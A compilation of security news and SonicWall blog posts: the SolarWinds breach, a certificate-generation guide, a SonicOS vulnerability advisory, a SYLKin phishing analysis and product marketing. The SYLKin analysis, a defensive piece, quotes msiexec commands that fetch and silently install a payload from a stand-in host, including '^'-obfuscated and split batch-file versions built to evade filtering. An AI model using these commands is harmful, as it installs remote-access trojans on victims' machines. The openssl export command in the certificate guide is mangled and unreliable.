Microsoft Says Its Systems Were Also Breached in Massive SolarWinds Hack

The massive state-sponsored espionage campaign that compromised software maker SolarWinds also targeted Microsoft, as the unfolding investigation into the hacking spree reveals the incident may have been far more wider in scope, sophistication, and impact than previously thought.

News of Microsoft’s compromise was first reported by Reuters, which also said the company’s own products were then used to strike other victims by leveraging its cloud offerings, citing people familiar with the matter.

The Windows maker, however, denied the threat actor had infiltrated its production systems to stage further attacks against its customers.

In a statement to The Hacker News via email, the company said —

“Like other SolarWinds customers, we have been actively looking for indicators of this actor and can confirm that we detected malicious SolarWinds binaries in our environment, which we isolated and removed. We have not found evidence of access to production services or customer data. Our investigations, which are ongoing, have found absolutely no indications that our systems were used to attack others.”

Characterizing the hack as “a moment of reckoning,” Microsoft president Brad Smith said it has notified over 40 customers located in Belgium, Canada, Israel, Mexico, Spain, the UAE, the UK, and the US that were singled out by the attackers. 44% of the victims are in the information technology sector, including software firms, IT services, and equipment providers.

CISA Issues New Advisory

The development comes as the US Cybersecurity and Infrastructure Security Agency (CISA) published a fresh advisory, stating the “APT actor [behind the compromises] has demonstrated patience, operational security, and complex tradecraft in these intrusions.”

“This threat poses a grave risk to the Federal Government and state, local, tribal, and territorial governments as well as critical infrastructure entities and other private sector organizations,” it added.

But in a twist, the agency also said it identified additional initial infection vectors, other than the SolarWinds Orion platform, that have been leveraged by the adversary to mount the attacks, including a previously stolen key to circumvent Duo’s multi-factor authentication (MFA) to access the mailbox of a user via Outlook Web App (OWA) service.

Digital forensics firm Volexity, which tracks the actor under the moniker Dark Halo, said the MFA bypass was one of the three incidents between late 2019 and 2020 aimed at a US-based think tank.

The entire intrusion campaign came to light earlier this week when FireEye disclosed it had detected a breach that also pilfered its Red Team penetration testing tools.

Since then, a number of agencies have been found to be attacked, including the US departments of Treasury, Commerce, Homeland Security, and Energy, the National Nuclear Security Administration (NNSA), and several state department networks.

While many details continue to remain unclear, the revelation about new modes of attack raises more questions about the level of access the attackers were able to gain across government and corporate systems worldwide.

Microsoft, FireEye, and GoDaddy Create a Killswitch

Over the last few days, Microsoft, FireEye, and GoDaddy seized control over one of the main GoDaddy domains — avsvmcloud[.]com — that was used by the hackers to communicate with the compromised systems, reconfiguring it to create a killswitch that would prevent the SUNBURST malware from continuing to operate on victims’ networks.

For its part, SolarWinds has not yet disclosed how exactly the attacker managed to gain extensive access to its systems to be able to insert malware into the company’s legitimate software updates.

Recent evidence, however, points to a compromise of its build and software release system. An estimated 18,000 Orion customers are said to have downloaded the updates containing the back door.

Symantec, which earlier uncovered more than 2,000 systems belonging to 100 customers that received the trojanized SolarWinds Orion updates, has now confirmed the deployment of a separate second-stage payload called Teardrop that’s used to install the Cobalt Strike Beacon against select targets of interest.

The hacks are believed to be the work of APT29, a Russian threat group also known as Cozy Bear, which has been linked to a series of breaches of critical US infrastructure over the past year.

The latest slew of intrusions has also led CISA, the US Federal Bureau of Investigation (FBI), and the Office of the Director of National Intelligence (ODNI) to issue a joint statement, stating the agencies are gathering intelligence in order to attribute, pursue, and disrupt the responsible threat actors.

Calling for stronger steps to hold nation-states accountable for cyberattacks, Smith said the attacks represent “an act of recklessness that created a serious technological vulnerability for the United States and the world.”

“In effect, this is not just an attack on specific targets, but on the trust and reliability of the world’s critical infrastructure in order to advance one nation’s intelligence agency,” he added.

Generate & Import An SSL Certificate Sonicwall

DESCRIPTION:

This article contains the steps required for generating a PKCS#12 file for import on an Email Security appliance.

RESOLUTION:

The first step is to generate a private key which can be done either in Linux or Windows.

Generating a private key in Linux

Access terminal within a Linux box

Type in the following command (or paste)  The names of the CSR and privatekey (in italics) can be adjusted accordingly, but the file type needs to remain the same.

 openssl req -out my_csr.txt -new -newkey rsa:2048 -nodes -keyout privatekey.txt

Skip to Generating the PKCS#12 file.

Generating a private key in Windows

1. Go to http://gnuwin32.sourceforge.net/packages/openssl.htm and download the openssl-0.9.8h-1-setup.exe file.

2. Run the .exe and install to c:\openssl

3. After installation completes, copy and paste the following into a text editor and save as openssl.cnf to C:\openssl\bin

 NOTE: Edit the alt_names section to include any SAN names that are needed, no other sections need to be edited at this time

[ req ]

distinguished_name = req_distinguished_name

req_extensions = v3_req

[ req_distinguished_name ]

countryName = Country Name (2 letter code)

countryName_default = US

stateOrProvinceName = State or Province Name (full name)

stateOrProvinceName_default = Arizona

localityName = Locality Name (eg, city)

localityName_default = Phoenix

0.organizationName                       = Organization Name (eg, company)

0.organizationName_default      = Test Bed USA

organizationalUnitName = Organizational Unit Name (eg, section)

organizationalUnitName_default = IT

commonName = Common Name of device

commonName_default = mail.example.com

commonName_max = 64

[ v3_req ]

basicConstraints = CA:FALSE

keyUsage = nonRepudiation, digitalSignature, keyEncipherment

subjectAltName = @alt_names

[alt_names]

DNS.1 = RA1.example.com

DNS.2 = RA2.example.com

DNS.2 = CC1.example.com

4. Open a command prompt & type or copy/paste cd c:\openssl\bin

5. Type openssl and press Enter, then paste the following command at the next prompt and move on to Generating the PKCS#12 file.

req -new -newkey rsa:2048 -nodes -keyout privatekey.txt -out my_csr.txt -config openssl.cnf

Generating the PKCS#12 file

1. Enter the information appropriate to the organization

2. Once the information is entered, two files will be created and placed in the C:\openssl\bin directory, my_csr.txt and privatekey.txt. Save them in a secure location.

3. Submit the my_csr.txt file to a Certificate Authority.

4. Download the necessary intermediate and root certificates.

5. From the command prompt, navigate to the openssl application as noted above and type or copy/paste the following to convert to PFX.

openssl pkcs12 -export – certificate.pfx -inkey privatekey.txt – certificate.crt – certfile CACert.crt

 NOTE: Edit the command with the appropriate information: certificate.pfx is the name of the converted certificate, privatekey.txt is the file generated in step 2, certificate.crt is the certificate generated by the CA, CACert.crt are the intermediate certs generated by the CA

6. Alternately, the certificate converter on https://www.sslshopper.com/ssl-converter.html can be used

 CAUTION: Using the converter is not recommended due to exposure of the private key to the internet

Importing the PKCS#12 file to the ES appliance

1. Login into the appliance and navigate to System > Certificates > Generate/Import

2. Choose a certificate name

 TIP: Use the CA followed by the expiration date of the certificate; e.g. Comodo20181212

3. Go to the “Import an existing certificate” option. Choose the PKCS#12 file generated in the previous section, create a passphrase and enter the password for the PKCS#12 file (letters and numbers ONLY).

4. Click Generate/Import

5. Configure the certificate at System > Certificates > Configure

 NOTE: Successful configuration can be tested at http://www.checktls.com/

Source :
https://www.sonicwall.com/support/knowledge-base/generate-import-an-ssl-certificate/171212150435742/

Critical SonicWall vulnerability affects 800K firewalls, patch now

A critical stack-based Buffer Overflow vulnerability has been discovered in SonicWall VPNs.

When exploited, it allows unauthenticated remote attackers to execute arbitrary code on the impacted devices.

Tracked as CVE-2020-5135, the vulnerability impacts multiple versions of SonicOS ran by hundreds of thousands of active VPNs.

Craig Young of Tripwire Vulnerability and Exposure Research Team (VERT) and Nikita Abramov of Positive Technologies have been credited with discovering and reporting the vulnerability.

Shodan lists over 800,000 devices

Given an increase in employees working remotely and the reliance on corporate VPNs, easily exploitable flaws like these are concerning when it comes to security.

As confirmed by Tenable researchers and observed by BleepingComputer, as of today, Shodan shows over 800,000 VPN devices running vulnerable SonicOS software versions, depending on the search term used.

Although a Proof-of-Concept (POC) exploit is not yet available in the wild, the vast attack surface available to adversaries means companies should upgrade their devices immediately.

Potentially exploitable devices listed on Shodan running vulnerable SonicOS versions
Source: BleepingComputer

Impacted versions and remediation guidance

The following SonicWall VPN devices are impacted by CVE-2020-5135:

  1. SonicOS 6.5.4.7-79n and earlier
  2. SonicOS 6.5.1.11-4n and earlier
  3. SonicOS 6.0.5.3-93o and earlier
  4. SonicOSv 6.5.4.4-44v-21-794 and earlier
  5. SonicOS 7.0.0.0-1

“SonicWall has released updates to remediate this flaw. SSL VPN portals may be disconnected from the Internet as a temporary mitigation before the patch is applied,” stated Tripwire VERT’s advisory.

The following versions are available to upgrade to for safeguarding against this vulnerability:

  1. SonicOS 6.5.4.7-83n
  2. SonicOS 6.5.1.12-1n
  3. SonicOS 6.0.5.3-94o
  4. SonicOS 6.5.4.v-21s-987
  5. Gen 7 7.0.0.0-2 and onwards

Provided the vast number of devices that are still running the outdated SonicOS versions and the critical nature of this vulnerability, complete research findings on CVE-2020-5135 are expected to be released once enough users have patched their systems.

Source :
https://www.bleepingcomputer.com/news/security/critical-sonicwall-vulnerability-affects-800k-firewalls-patch-now/

Protect Against SYLKin Attack with SonicWall Cloud App Security

With the definition of normal changing with each passing day, the ongoing pandemic has forced security professionals to re-evaluate new working models and how they can prevent attackers from targeting end users. Albert Einstein once said, “In the midst of every crisis lies great opportunity,” and this idea has formed the basis for how cybercriminals operate in the era of COVID-19.

Never ones to let an opportunity go to waste, cybercriminals are deploying new attacks each day. Microsoft was recently affected by a new SYLKIN Attack that bypasses both Microsoft 365 default security (EOP) and Microsoft advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable, and the attack is still being used extensively against Microsoft 365 customers.

Lately Avanan’s security analysts have detected a significant increase in the usage of SLK files in attacks against Microsoft 365 customers. In these attacks, hackers send an email with a .slk attachment that contains a malicious macro (msiexec script) to download and install a remote access trojan.

It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. Gmail customers, on other hand, are safe from this attack — Google already blocks it on incoming email and has made it impossible to send these SLK files as an attachment from a Gmail account.

What is SYLKin attack?

Again, SLK files are rare, so if you have received one in your inbox, chances are you are being targeted by the most recent Remote Access Trojan malware that has been ‘upgraded’ to bypass Microsoft ATP. The attack method itself has been extensively documented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including Microsoft ATP.

The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations.

Emails are targeted and manually created

The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm will ask for changes to a large electronics order, or an email to a government department will discuss legal concerns. The subjects, contents and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.

What is a SLK file?

A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format that saw its last update around the time that “Dallas” went off the air in 1986. At a time when XLS files were proprietary, SLK was an open-format alternative before XLSX was introduced in 2007. To the end user, a SLK file looks like an Excel document — but for an attacker,  it’s an easy way to bypass Microsoft 365 security, even for accounts protected with Microsoft ATP.

What does this attack do?

A recent version of the SYLK attack includes an SLK file with an obfuscated macro designed to run a command on a Windows machine:

msiexec /i http://malicious-site.com/install.php /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it’s a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

Windows grants more trust to SLK files than XLSX files

Because Windows “Protected View” does not apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode.

When opening an SLK file, the end user does not see this message:

Targeted methodology to bypass Microsoft Advanced Threat Protection

The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft ATP. This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass Microsoft ATP.

  1. The attack was sent from hundreds of free hotmail accounts
  2. The macro script includes ‘^’ characters to confuse ATP filters.
  3. The URL was split in two so that ATP would not read it as a web link,
  4. The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
  5. The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

These methods are ATP-specific. Again, Gmail blocks these files and, in fact, makes it impossible to send from a Gmail account.

The attackers took advantage of a series of blind spots in the Microsoft email infrastructure to send this attack from thousands of disposable Hotmail accounts, with email addresses in the format “randomwords1982@hotmail.com,” each sending just a handful or messages at a time.

An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.

While most of the well-known anonymous email-sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders.

The macro script includes escape characters to confuse ATP filters

The attackers take advantage of the fact that ATP filters do not interpret text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command, but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.

msiexec /i http://malicious-site.com/install.php /q

becomes

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the telltale ‘http://’ is obscured.

When read by the desktop command line, the escape characters ‘disappear,’ running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.

The URL was split into two macros so that ATP would not read it as a link

ATP does not need to see the ‘http://’ to recognize a web link and would normally catch any text of the format ‘malicious-site.com.’ In order to hide the link, the attackers split it into two separate commands.

The first macro command creates a batch file with the first half of the URL.

Set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JbfoT.bat

The second macro command adds the remainder of the URL and then runs the batch file.

Set /p=””e.com/install.php ^/q”” >> JbfoT.bat & JbfoT.bat

Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.

The hosting server was armed after the message was sent

We don’t believe Microsoft ATP is testing these files within their sandbox environment, relying instead on static filters. But we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.

There is no special code or intelligence within the script to detect if it is running within emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because it cannot reach the server, the script fails, installing nothing.

In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider, as the reported content is no longer available at the links associated with the attack by the time a manual take-down notice is requested.

The coordinated timing of the hosting servers with the sending of the emails is characteristic of a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, it suggests an APT group or state actor.

The hosting server only responded to requests from “Windows Installer” agents

In addition to their on-and-off timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.

How did it evade Microsoft protection?

Each of the obfuscation methodologies were designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments have the same MD5 hash, which requires each file to be given additional scrutiny.

Got SonicWall CAS protecting your inbox? Don’t worry, we have you protected.

If you have SonicWall Cloud App Security protecting your organization’s inbox and you are running in Protect (Inline) mode, this attack is blocked, and users will not see these attacks in their inbox. (If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.)

Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap.

Microsoft’s recommendations are much more complicated but are another alternative to protect the desktop.

Source :
https://blog.sonicwall.com/en-us/2020/08/protect-against-sylkin-attack-with-sonicwall-cloud-app-security/

New SonicWall SonicOSX 7.0 and SonicOS 7.0 Operating Systems Offer Visibility and Simplicity

Businesses are embracing digital transformation, bringing about a new era of the anytime, anywhere business. Staffed by flexible employees and built on the principle of a distributed enterprise, the resulting proliferation of applications and data presents organizations with a major security challenge.

As enterprises grow, they must proactively manage security across several different locations: at headquarters, at software-defined branches (SD-Branches), at co-located data centers or in a variety of cloud locations. These locations are not siloed — applications and data move dynamically between them, forcing security to follow.

SonicWall physical and virtual firewalls provide high-performance security across a wide range of enterprises, but protecting all these security vectors requires the ability to consistently apply the right security policy to the right network control point — while keeping in mind that some security failures can be attributed to ineffective policies or misconfigurations.

To ensure effective policy provisioning, enterprises need dynamic visibility across the network. They need a boundless approach to network security policy management.

The SonicOS or SonicOSX architecture is at the core of every SonicWall physical and virtual firewall, including the TZ, NSa, NSv and NSsp Series. Our operating systems leverage our patented, single-pass, low-latency, Reassembly-Free Deep Packet Inspection® (RFDPI) and patent-pending Real-Time Deep Memory Inspection™ (RTDMI) technologies to deliver industry-validated high security effectiveness, Secure SD-WAN, real-time visualization, high-speed virtual private networking (VPN) and other robust security features.

The latest TZ570/670 Series firewalls run on the brand-new SonicOS 7.0, which features advanced security, simplified policy management, and critical networking and management capabilities — all designed to meet the needs of distributed enterprises with next-gen SD-Branches and small- to medium-sized businesses.

With the introduction of the brand-new SonicOSX 7.0 and SonicOS 7.0, the SonicOS operating system is setting a new standard for usability. Built from the ground up, SonicOSX 7.0 architecture features Unified Policy management, which offers integrated management of various security policies for enterprise-grade firewalls such as SonicWall NSsp and NSv firewall series.

This OS upgrade brings about multi-instance support on NSsp series firewalls. Multi-instance is the next generation of multi-tenancy, where each tenant is isolated with dedicated compute resources to avoid resource starvation.

SonicOSX 7 also provides unified policy to provision L3 to L7 controls in a single rule base on every firewall, providing admins a centralized location for configuring policies. It comes with a new web interface born from a radically different approach: a user-first design emphasis. SonicOSX’s web-based interface presents meaningful visualizations of threat information, and displays actionable alerts prompting you to configure contextual security policies with point-and-click simplicity.

In addition to being more user friendly, the new interface is also more attractive than the classic version. In a single-pane view of a firewall, the interface presents the user with information on the effectiveness of various security rules. The user is then able to modify the predefined rules for gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, and deep-packet inspection of encrypted traffic in a seamless fashion. With Unified Policy, SonicWall delivers a more streamlined experience that reduces configuration errors and deployment time for a better overall security posture.

The Unified Policy gives your organization the ability to control dynamic traffic passing through a firewall and provides visibility and insight into the disparate policies that affect gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, deep-packet inspection of encrypted traffic and more. It helps simplify management tasks, reduce configuration errors and speed up deployment time, which all contribute to a better overall security posture.

To learn more, visit www.sonicwall.com/sonicos

Source :
https://blog.sonicwall.com/en-us/2020/08/new-sonicwall-sonicosx-7-0-and-sonicos-7-0-offer-visibility-and-simplicity/

SonicWall’s New SD-Branch Solution, Multi-gigabit Switch Line Secure Dispersed Businesses, Branch Locations

There’s nothing normal about the “new business normal.” The past few months have represented a complete shift in the way we think of work  — and with vastly more employees working remotely than ever before, bringing with them an unprecedented quantity of exposure points and risk, the traditional cybersecurity model is proving woefully inadequate.

As cybercriminals ramp up attacks on anyone they perceive to be vulnerable, it isn’t enough to simply enable working from home. To truly ensure business continuity, you must secure and rearchitect these massively distributed networks with a platform capable of stopping the ever-increasing number of threats — both known and unknown.

To help your organization meet the challenges brought by this new cybersecurity reality, SonicWall is introducing three new solutions: SonicWall SD-Branch, SonicWall Switch and SonicWall Capture Client 3.0.

SonicWall SD-Branch

Many businesses need to secure remote branch offices and retail stores, but it often isn’t possible — or practical — to have dedicated IT staff at each of these locations. SonicWall SD-Branch enables your organization to provide seamless connectivity that keeps pace with escalating bandwidth demands, and allows you to quickly and cost-effectively upgrade the network security at your remote locations.

Secure SD-Branch is a comprehensive solution that combines the power of secure SD-WANsecure wireless and wired LAN technology with zero-touch deployment. Through the power of Capture Security Center — SonicWall’s cloud-based, single-pane-of-glass management console — the management, reporting and analytics for all locations is centralized and accessible from any web-enabled device.

SonicWall Switches

The shift to remote work has resulted in a sudden rise in the use of high-bandwidth applications — something that can easily overwhelm branch networks. At the same time, monitoring, managing and continually refreshing a growing number of network devices across multiple branches has grown exponentially more difficult, especially since many branch locations don’t have trained IT staff.

SonicWall Switches offer multi-gigabit wired performance that lets you rapidly scale your branch networks through remote installation. Available in seven models — ranging from eight to 48 ports, with gigabit and 10 gigabit ethernet ports — SonicWall Switches deliver network switching that accommodates the growing number of mobile and IoT devices in branch locations and provides the network performance needed to support cloud-delivered applications. SonicWall Switches also fit seamlessly into your existing SonicWall ecosystem, helping you to unify your network security posture. They’re SD-Branch-ready and managed via firewalls — either locally or through SonicWall’s cloud-based Capture Security Center — for unified, single-pane-of-glass management of your entire SonicWall infrastructure.

SonicWall Capture Client 3.0

SonicWall Capture Client 3.0 allows employees to operate remotely without having to worry to about advanced threats, all while giving administrators comprehensive visibility and the ability to extend standard protections to remote endpoints. SonicWall Capture Client 3.0 is the latest iteration of our lightweight, unified endpoint protection platform, and features a number of new and upgraded features.

Capture Client 3.0’s comprehensive, client-based content filtering allows you to easily extend network-based content filtering to off-network users. It provides HTTP and HTTPS traffic inspection capabilities, along with the ability to assign exclusions for trusted applications or blacklist untrusted applications. Capture Client also offers real-time visibility of applications and identifies vulnerabilities.

Starting with Capture Client 3.0, administrators can leverage Azure active directory properties for granular policy assignment based on categories such as group membership — regardless of whether the directory is hosted on-prem or in the cloud.

Capture Client 3.0 also brings in support for the SentinelOne Linux agent, enabling you to extend next-generation antimalware capabilities to Linux servers. This feature will allow customers to safeguard Linux-based workloads irrespective of their location — on-prem or in the cloud.

Source :
https://blog.sonicwall.com/en-us/2020/06/sonicwalls-new-sd-branch-solution-multi-gigabit-switch-line/

Effective Business Continuity Plans Require CISOs to Rethink WAN Connectivity

As more businesses leverage remote, mobile, and temporary workforces, the elements of business continuity planning are evolving and requiring that IT professionals look deep into the nuts and bolts of connectivity.

CISOs and their team members are facing new challenges each and every day, many of which have been driven by digital transformation, as well as the adoption of other productivity-enhancing technologies.

A case in point is the rapidly evolving need to support remote and mobile users as businesses change how they interact with staffers.

For example, the recent COVID-19 crisis has forced the majority of businesses worldwide to support employees that work from home or other remote locations.

Many businesses are encountering numerous problems with connection reliability, as well as the challenges presented by rapidly scaling connectivity to meet a growing number of remote workers.

Add to that security and privacy issues, and it becomes evident that CISOs may very well face what may become insurmountable challenges to keep things working and secure.

It is the potential for disruption that is bringing Business Continuity Planning (BCP) to the forefront of many IT conversations. What's more, many IT professionals are quickly coming to the conclusion that persistent WAN and Internet connectivity prove to be the foundation of an effective business continuity plan.

VPNs are Failing to Deliver

Virtual Private Networks (VPNs) are often the first choice for creating secure connections into a corporate network from the outside world.

However, VPNs have initially been designed to allow a remote endpoint to attach to an internal local area network and grant that system access to data and applications stored on the network.

For occasional connectivity, with a focus on ease of use.

Yet, VPNs are quickly beginning to show their limitations when placed under the demand for supporting a rapidly deployed remote workforce.

One of the most significant issues around VPNs comes in the context of scalability; in other words, VPNs can be complicated to scale quickly.

For the most part, VPNs are licensed by connection and are supported by an appliance on the network side to encrypt and decrypt traffic. The more VPN users that are added, the more licenses and processing power that is needed, which ultimately adds unforeseen costs, as well as introducing additional latency into the network.

Eventually, VPNs can break under strain, and that creates an issue around business continuity. Simply put, if VPNs become overwhelmed by increased traffic, connectivity may fail, and the ability for employees to access the network may be impacted, the concept of business continuity suffers as a result.

VPNs are also used for site to site connections, where the bandwidth may be shared not only from a branch office to a headquarters office but also with remote users. A situation such as that can completely derail an organization's ability to do business if those VPNs fail.

Perhaps an even bigger concern with VPNs comes in the form of cybersecurity. VPNs that are used to give remote users access to a network are only as reliable as the credentials that are given to those remote users.

In some cases, users may share password and login information with others, or carelessly expose their systems to intrusion or theft. Ultimately, VPNs may pave the way for attacks on the corporate network by allowing bad actors to access systems.

ZTNA Moves Beyond VPNs

With VPN technology becoming suspect in the rapid expansion of remote workforces, CISOs and IT pros are looking for alternatives to ensure reliable and secure connections into the network from remote workers.

The desire to bridge security and reliability is driven by continuity, as well as operational issues. CISOs are looking to keep costs down, provide a level of security, without compromising performance, and still meet projected growth.

Many enterprises thought that the answer to the VPN dilemma could be found in SDP (Software Defined Perimeters) or ZTNA (Zero Trust Network Access), two acronyms that have become interchangeable in the arena of cybersecurity.

ZTNA has been built for the cloud as a solution that shifted security from the network to the applications. In other words, ZTNA is application-centric, meaning that users are granted access to applications and not the complete network.

Of course, ZTNA does much more than that. ZTNA can "hide" applications, while still granting access to authorized users. Unlike VPNs, ZTNA technology does not broadcast any information outside of the network for authentication, whereas VPN concentrators sit at the edge of the network for all to see, making them a target for malicious attackers.

What's more, ZTNA uses inside-out connections, which means IP addresses are never exposed to the internet. Instead of granting access to the network like a VPN, ZTNA technology uses a micro-segmentation approach, where a secure segment is created between the end-user and the named application.

ZTNA creates an access environment that provides private access to an application for an individual user, and only grants the lowest level of privileges to that user.

ZTNA technology decouples access to applications from access to the network, creating a new paradigm of connectivity. ZTNA based solutions also capture much more information than a VPN, which helps with analytics and security planning.

While a VPN may only track a device's IP address, port data, and protocols, ZTNA solutions capture data around the user identity, named application, latency, locations, and much more. It creates an environment that allows administrators to be more proactive and more easily consume and analyze the information.

While ZTNA may be a monumental step forward from legacy VPN systems, ZTNA solutions are not without their own concerns. ZTNA solutions do not address performance and scalability issues and may lack the core components of continuity, such as failover and automated rerouting of traffic.

In other words, ZTNA may require those additional third-party solutions to be added to the mix to support BCP.

Resolving ZTNA and VPN issues with SASE

A newer technology, which goes by the moniker of SASE (Secure Access Service Edge), may very well have the answer to the dilemmas of security, continuity, and scale that both ZTNA and VPNs introduce into the networking equation.

The Secure Access Service Edge (SASE) model was proposed by Gartner's leading security analysts, Neil MacDonald, Lawrence Orans, and Joe Skorupa. Gartner presents SASE as a way to collapse the networking and security stacks of SD-WANs into a fully integrated offering that is both easy to deploy and manage.

Gartner sees SASE as a game-changer in the world of wide-area networking and cloud connectivity. The research house expects 40% of enterprises to adopt SASE by 2024. However, a significant challenge remains, networking and cybersecurity vendors are still building their SASE offerings, and very few are actually available at this time.

One such vendor is Cato Networks, which offers a fully baked SASE solution and has been identified as one of the leaders in the SASE game by Gartner.

SASE differs significantly from the VPN and ZTNA models by leveraging a native cloud architecture that is built on the concepts of SD-WAN (Software-Defined Wide Area Network). According to Gartner, SASE is an identity-driven connectivity platform that uses a native cloud architecture to support secure connectivity at the network edge that is globally distributed.

SASE gives organizations access to what is essentially a private networking backbone that runs within the global internet. What's more, SASE incorporates automated failover, AI-driven performance tuning, and multiple secure paths into the private backbone.

SASE is deployed at the edge of the network, where the LAN connects to the public internet to access cloud or other services. And as with other SD-WAN offerings, the edge has to connect to something beyond the four walls of the private network.

In Cato's case, the company has created a global private backbone, which is connected via multiple network providers. Cato has built a private cloud that can be reached over the public internet.

SASE also offers the ability to combine the benefits of SDP with the resiliency of an SD-WAN, without introducing any of the shortcomings of a VPN.

Case in point is Cato's Instant Access, a clientless connectivity model that uses a Software-Defined Perimeter (SDP) solution to grant secure access to cloud-delivered applications for authorized remote users.

Instant access offers multi-factor authentication, single sign-on, least privileged access, and is incorporated into the combined networking and security stacks. Since it is built on SASE, full administrator visibility is a reality, as well as simplified deployment, instant scalability, integrated performance management, and automated failover.

Cato Networks' Remote Access Product Demo

In Cato's case, continuous threat protection keeps remote workers, as well as the network, safe from network-based threats. Cato's security stack includes NGFW, SWG, IPS, advanced anti-malware, and Managed Threat Detection and Response (MDR) service. Of course, Cato isn't the only player in the SASE game; other vendors pushing into SASE territory include Cisco, Akamai, Palo Alto Networks, Symantec, VMWare, and Netskope.

SASE Address the Problems of VPNs, ZTNA -- and More

With VPNs coming up short and ZTNA lacking critical functionality, such as ease of scale and performance management, it is quickly becoming evident that CISOs may need to take a long hard look at SASE.

SASE addresses the all too common problems that VPNs are introducing into a rapidly evolving remote work paradigm, while still offering the application-centric security that ZTNA brings to the table.

What's more, SASE brings with it advanced security, enhanced visibility, and reliability that will go a long way to improving continuity, while also potentially lowering costs.

Source :
https://thehackernews.com/2020/05/rethink-wan-connectivity.html

Why Securing Remote Work is Crucial To Ensuring Business Continuity

If you had asked them in January, most organizations would probably have said things were humming along smoothly. Economic growth was strong, and in most cases budgets and security plans were being created and carried out without any need or intention to disrupt the status quo.

Then the entire world changed.

Within the space of a couple weeks, bustling offices were deserted one by one as federal, state, provincial and local governments issued stay-at-home and shelter-in-place orders, and employees boxed up their essential belongings and became part of the rapidly expanding global remote workforce.

While these moves were necessary to stem the spread of COVID-19, the disruption that this sudden change brought with it introduced a set of problems most businesses were ill-equipped to manage.

Companies that previously felt confident in their cybersecurity strategy suddenly found that they didn’t have the capacity or licenses to secure a full-scale mobile workforce. Worse, they needed to manage employees ill-prepared for the transition, many of whom didn’t understand the additional precautions required for safe remote work.

For hackers, though, these are the salad days — and the combination of inexperienced employees and unprepared businesses has brought them out in force. According to Reuters, hacking activity targeting corporations in the U.S. and elsewhere more than doubled in March, and preliminary reports show much the same for April. These threats highlight the urgent need for scalable Secure Remote Access and VPN license capacity to handle the new influx of remote employees while offering the same level of security offered on-prem.

Greater capacity for increased security

To help small- and medium-sized businesses (SMB) handle a rapidly expanding remote workforce, SonicWall has improved the scalability of its SMA 210 and 410 appliances — the 210 can now manage up to 200 remote VPN users, and the 410 can now support 400.

Many enterprises, governments and MSSPs are facing issues with scalability, too. To handle the influx of remote users on large distributed networks, the SonicWall SMA 1000 series allows these organizations to scale up to a million remote VPN users.

To scope which SMA solution is right for your organization, review the SonicWall Secure Mobile Access data sheet.

New public cloud options for the ‘new business normal’

The remote-work revolution coincides with another major shift in how enterprises work — the ongoing cloud transformation. The benefits of moving to a public cloud are myriad — including cost savings, greater agility, maximum uptime and quick and easy deployment.

While SonicWall has long supported private clouds, such as VMware ESXi and Microsoft Hyper-V, SonicWall SMA 500v and SMA 8200v virtual appliances can now be launched on AWS or Microsoft Azure, allowing businesses to realize these benefits at a time when they may need them the most.

Protect remote workers with special offers on SMA, VPN

Right now, budget concerns are at the forefront for many businesses. To help both new and existing customers implement necessary security during this time of crisis, SonicWall has launched several new ‘Work From Home Securely’ promotions to ensure organizations can implement comprehensive security in a cost-effective way.

With SonicWall’s new Work From Home Securely special offers on SMA and other solutions, there’s never been a better time — or a more crucial time — to secure your remote workforce

Source :
https://blog.sonicwall.com/en-us/2020/04/why-securing-remote-work-is-crucial-to-ensuring-business-continuity/

SonicWall Firewall Certified via NetSecOPEN Laboratory Testing, Earns Perfect Security Effectiveness Score Against Private CVE Attacks

Security-conscious customers face tough choices when evaluating security vendors and their next-generation firewall offerings.

